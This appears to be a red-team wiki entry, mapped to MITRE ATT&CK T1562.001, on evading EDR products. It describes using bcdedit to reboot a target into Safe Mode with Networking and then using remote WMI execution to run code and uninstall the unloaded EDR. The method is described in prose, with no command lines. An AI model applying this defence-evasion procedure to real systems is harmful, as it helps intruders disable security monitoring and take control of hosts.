Safe Mode With Networking
MITRE ATT&CKโข Impair Defenses: Disable or Modify Tools - Technique T1562.001
Last updated
MITRE ATT&CKโข Impair Defenses: Disable or Modify Tools - Technique T1562.001
Last updated
Safe Mode with Networking is a specific way to start up your Windows computer when itโs experiencing significant problems. This mode will load only the most basic files and drivers needed for the operating system to function while also enabling networking capabilities
EDR drivers and other components will therefore not be loaded in safe mode, although we can still access the target via the network.
In order to bypass EDR products using the following method, a reboot is required, which is a bad OPSEC operation.
On the target, we can use bcdedit to enable Safe Mode With Networking on the next reboot, and reboot the host
After rebooting, the target will only have RPC ports open
We can utilize Remote WMI execution methods to achieve code execution on the system. Since the EDR has not been loaded, we may attempt to uninstall it or perform actions that would typically be blocked.
